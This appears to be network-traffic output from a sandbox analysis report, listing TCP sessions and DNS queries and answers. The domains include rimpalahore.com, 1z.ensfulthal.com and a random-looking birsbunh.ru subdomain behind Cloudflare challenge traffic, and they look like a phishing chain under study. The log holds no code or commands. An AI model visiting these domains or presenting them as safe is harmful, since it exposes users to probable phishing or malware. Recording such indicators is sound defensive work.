                                                                                          Nov 27, 2024 15:15:26.909987926 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.910094976 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.910111904 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:26.910125971 CET49745443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:15:26.910131931 CET4434974552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:15:44.747070074 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:44.747164965 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:44.747288942 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:44.747566938 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:44.747606039 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:46.484452963 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:46.484750986 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:46.484821081 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:46.485172987 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:46.485619068 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:46.485711098 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:46.532011986 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:48.424531937 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:48.424612999 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:48.424700022 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:48.426314116 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:48.426347971 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:49.683327913 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:49.683690071 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:49.683751106 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:49.684184074 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:49.684580088 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:49.684660912 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:49.684799910 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:49.684961081 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:49.684994936 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:49.685102940 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:49.685163975 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.333161116 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.333256006 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.333290100 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.333323002 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.333326101 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:50.333367109 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.333405018 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:50.333447933 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.333507061 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:50.334104061 CET49748443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:50.334132910 CET44349748104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.337522984 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:50.337563992 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.337651014 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:50.337892056 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:50.337907076 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.767512083 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:50.767543077 CET44349750172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.767637014 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:50.769254923 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:50.769269943 CET44349750172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:51.595546007 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:51.596024990 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:51.596044064 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:51.596415997 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:51.596885920 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:51.596962929 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:51.597086906 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:51.643330097 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.061002970 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.061098099 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.061194897 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:52.062098026 CET49749443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:52.062119007 CET44349749104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.081442118 CET44349750172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.081712961 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.081739902 CET44349750172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.082724094 CET44349750172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.082804918 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083097935 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083112955 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083161116 CET44349750172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.083175898 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083239079 CET49750443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083452940 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083491087 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:52.083578110 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083755970 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:52.083782911 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:53.415864944 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:53.416285992 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:53.416297913 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:53.417480946 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:53.417571068 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:53.418700933 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:53.418764114 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:53.418891907 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:53.418900013 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:53.461009026 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:54.561664104 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.561769009 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.561858892 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:54.562601089 CET49751443192.168.2.16172.67.191.200
                                                                                          Nov 27, 2024 15:15:54.562618971 CET44349751172.67.191.200192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.715783119 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:54.715823889 CET44349752104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.715922117 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:54.716228008 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:54.716239929 CET44349752104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:55.974041939 CET44349752104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:55.974524021 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.974555016 CET44349752104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:55.975599051 CET44349752104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:55.975681067 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976000071 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976020098 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976066113 CET44349752104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:55.976068020 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976115942 CET49752443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976476908 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976550102 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:55.976629019 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976927996 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:55.976947069 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:56.197603941 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:56.197683096 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:56.197746992 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:56.478780985 CET49747443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:15:56.478821039 CET44349747142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:57.281198978 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:57.281574965 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:57.281611919 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:57.282656908 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:57.282736063 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:57.283080101 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:57.283159971 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:57.283253908 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:57.283262014 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:57.325037956 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:58.417439938 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:58.417546034 CET44349753104.21.11.98192.168.2.16
                                                                                          Nov 27, 2024 15:15:58.417603970 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:58.418687105 CET49753443192.168.2.16104.21.11.98
                                                                                          Nov 27, 2024 15:15:58.418709040 CET44349753104.21.11.98192.168.2.16
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 27, 2024 15:14:40.059134007 CET5760553192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:14:40.059272051 CET5180953192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:14:40.146015882 CET53550631.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:14:40.197952032 CET53647131.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:14:40.531290054 CET53576051.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:14:40.531569004 CET53518091.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:14:42.944560051 CET53592201.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:14:44.693557024 CET6056753192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:14:44.693727016 CET5376053192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:14:44.831248999 CET53605671.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:14:44.832700968 CET53537601.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:14:45.789578915 CET5320253192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:00.034291029 CET53650981.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:00.955964088 CET5951453192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:00.956147909 CET5609553192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:01.313775063 CET53595141.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:01.313818932 CET53560951.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.985827923 CET5814553192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:04.985980988 CET5611053192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:04.986275911 CET5478253192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:04.986402035 CET6021653192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:04.986654043 CET5717353192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:04.986787081 CET5213753192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:05.152916908 CET53561101.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.154084921 CET53602161.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.156024933 CET53581451.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.156949997 CET53521371.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.157416105 CET53571731.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.159238100 CET53547821.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.389250040 CET6128253192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:07.389406919 CET6384353192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:07.417952061 CET6133653192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:07.418317080 CET5367153192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:07.531960011 CET53638431.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.534722090 CET53612821.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.558209896 CET53536711.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.559329987 CET53613361.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:09.102094889 CET5244553192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:09.102229118 CET5713153192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:09.118218899 CET6480853192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:09.118376970 CET5527853192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:09.239763975 CET53524451.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:09.241137028 CET53571311.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:09.255955935 CET53648081.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:09.262090921 CET53552781.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.279803991 CET6431953192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:14.279961109 CET5911153192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:14.420655012 CET53643191.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:14.422126055 CET53591111.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:19.149434090 CET53548021.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:37.598994970 CET138138192.168.2.16192.168.2.255
                                                                                          Nov 27, 2024 15:15:40.115927935 CET53561321.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:41.648175001 CET53621401.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.341161966 CET5664353192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:50.341330051 CET6180753192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:50.764374971 CET53618071.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:50.766809940 CET53566431.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.574546099 CET6093853192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:54.574759007 CET5743353192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:54.714481115 CET53574331.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.715167999 CET53609381.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.820374012 CET53648881.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.820491076 CET53644981.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.961837053 CET53589341.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:54.983556032 CET5895553192.168.2.168.8.8.8
                                                                                          Nov 27, 2024 15:15:54.984067917 CET6103853192.168.2.161.1.1.1
                                                                                          Nov 27, 2024 15:15:55.118859053 CET53589558.8.8.8192.168.2.16
                                                                                          Nov 27, 2024 15:15:55.122531891 CET53610381.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:56.142133951 CET53526871.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:15:56.142157078 CET53527991.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:01.306365967 CET53610471.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:01.315942049 CET53499451.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:01.454543114 CET53593091.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:10.156939030 CET53500301.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:25.238456011 CET53622411.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:31.606091022 CET53496321.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:31.608920097 CET53612031.1.1.1192.168.2.16
                                                                                          Nov 27, 2024 15:16:31.750411987 CET53516911.1.1.1192.168.2.16
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Nov 27, 2024 15:14:40.059134007 CET192.168.2.161.1.1.10x4a45Standard query (0)rimpalahore.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:40.059272051 CET192.168.2.161.1.1.10xa12dStandard query (0)rimpalahore.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:44.693557024 CET192.168.2.161.1.1.10x666cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:44.693727016 CET192.168.2.161.1.1.10x236eStandard query (0)www.google.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:45.789578915 CET192.168.2.161.1.1.10x8171Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:00.955964088 CET192.168.2.161.1.1.10x750aStandard query (0)1z.ensfulthal.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:00.956147909 CET192.168.2.161.1.1.10x6e56Standard query (0)1z.ensfulthal.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:04.985827923 CET192.168.2.161.1.1.10xdce2Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:04.985980988 CET192.168.2.161.1.1.10x4ce3Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:04.986275911 CET192.168.2.161.1.1.10xc44cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:04.986402035 CET192.168.2.161.1.1.10x18afStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:04.986654043 CET192.168.2.161.1.1.10xad9eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:04.986787081 CET192.168.2.161.1.1.10xae36Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.389250040 CET192.168.2.161.1.1.10x383eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.389406919 CET192.168.2.161.1.1.10xda57Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.417952061 CET192.168.2.161.1.1.10xfc91Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.418317080 CET192.168.2.161.1.1.10x3f50Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.102094889 CET192.168.2.161.1.1.10x74b0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.102229118 CET192.168.2.161.1.1.10x13dStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.118218899 CET192.168.2.161.1.1.10xe17cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.118376970 CET192.168.2.161.1.1.10x6408Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:14.279803991 CET192.168.2.161.1.1.10x5d8cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:14.279961109 CET192.168.2.161.1.1.10xa54bStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:50.341161966 CET192.168.2.161.1.1.10xe83dStandard query (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:50.341330051 CET192.168.2.161.1.1.10xa198Standard query (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:54.574546099 CET192.168.2.161.1.1.10xf89dStandard query (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:54.574759007 CET192.168.2.161.1.1.10xaa6dStandard query (0)u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:54.983556032 CET192.168.2.168.8.8.80x3014Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:54.984067917 CET192.168.2.161.1.1.10xacf5Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Nov 27, 2024 15:14:37.775377989 CET1.1.1.1192.168.2.160x68b2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:37.775377989 CET1.1.1.1192.168.2.160x68b2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:40.531290054 CET1.1.1.1192.168.2.160x4a45No error (0)rimpalahore.com135.181.212.206A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:44.831248999 CET1.1.1.1192.168.2.160x666cNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:44.832700968 CET1.1.1.1192.168.2.160x236eNo error (0)www.google.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:46.145169020 CET1.1.1.1192.168.2.160x8171No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:48.008717060 CET1.1.1.1192.168.2.160xbb32No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:14:48.008717060 CET1.1.1.1192.168.2.160xbb32No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:00.303126097 CET1.1.1.1192.168.2.160xe99aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:00.303126097 CET1.1.1.1192.168.2.160xe99aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:01.313775063 CET1.1.1.1192.168.2.160x750aNo error (0)1z.ensfulthal.com104.21.52.130A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:01.313775063 CET1.1.1.1192.168.2.160x750aNo error (0)1z.ensfulthal.com172.67.199.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:01.313818932 CET1.1.1.1192.168.2.160x6e56No error (0)1z.ensfulthal.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.154084921 CET1.1.1.1192.168.2.160x18afNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.156024933 CET1.1.1.1192.168.2.160xdce2No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.156024933 CET1.1.1.1192.168.2.160xdce2No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.156024933 CET1.1.1.1192.168.2.160xdce2No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.156024933 CET1.1.1.1192.168.2.160xdce2No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.156949997 CET1.1.1.1192.168.2.160xae36No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.157416105 CET1.1.1.1192.168.2.160xad9eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.157416105 CET1.1.1.1192.168.2.160xad9eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.159238100 CET1.1.1.1192.168.2.160xc44cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:05.159238100 CET1.1.1.1192.168.2.160xc44cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.531960011 CET1.1.1.1192.168.2.160xda57No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.534722090 CET1.1.1.1192.168.2.160x383eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.534722090 CET1.1.1.1192.168.2.160x383eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.559329987 CET1.1.1.1192.168.2.160xfc91No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.559329987 CET1.1.1.1192.168.2.160xfc91No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.559329987 CET1.1.1.1192.168.2.160xfc91No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:07.559329987 CET1.1.1.1192.168.2.160xfc91No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.239763975 CET1.1.1.1192.168.2.160x74b0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                          Nov 27, 2024 15:15:09.239763975 CET1.1.1.1192.168.2.160x74b0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
